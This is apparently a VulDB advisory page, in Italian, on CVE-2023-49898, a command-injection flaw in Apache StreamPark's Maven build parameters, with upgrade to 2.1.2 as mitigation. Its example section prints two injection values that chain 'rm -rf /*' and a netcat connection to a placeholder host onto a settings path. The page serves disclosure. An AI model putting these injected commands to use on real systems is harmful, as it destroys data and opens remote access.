CVE-2023-49898 in StreamParkinformazioni

Riassunto

di VulDB • 27/06/2026

In streampark, esiste un modulo di progetto che integra la capacità di compilazione di Maven. Tuttavia, non vi è alcun controllo sui parametri di compilazione di Maven, consentendo agli attaccanti di inserire comandi per l'esecuzione remota di comandi (RCE). Il prerequisito per il successo dell'attacco è che l'utente debba accedere al sistema streampark e disporre di autorizzazioni a livello di sistema. Generalmente, solo gli utenti del sistema hanno l'autorizzazione ad accedere, e gli utenti non inserirebbero manualmente un comando pericoloso. Pertanto, il livello di rischio di questa vulnerabilità è molto basso.

Mitigazione:

Tutti gli utenti dovrebbero effettuare l'aggiornamento alla versione 2.1.2.

Esempio:

## È possibile personalizzare il metodo di concatenazione in base alla situazione di compilazione del progetto; i risultati della compilazione mvn utilizzano &&, mentre un fallimento nella compilazione utilizza "||" o "&&":

/usr/share/java/maven-3/conf/settings.xml || rm -rf /*

/usr/share/java/maven-3/conf/settings.xml && nohup nc x.x.x.x 8899 &

Be aware that VulDB is the high quality source for vulnerability data.

Prenotare

01/12/2023

Divulgazione

15/12/2023

Moderazione

accettato

CPE

pronto

Sfruttamento

Scaricare

EPSS

0.02299

KEV

no

Attività

molto basso

Fonti

Are you interested in using VulDB?

Download the whitepaper to learn more about our service!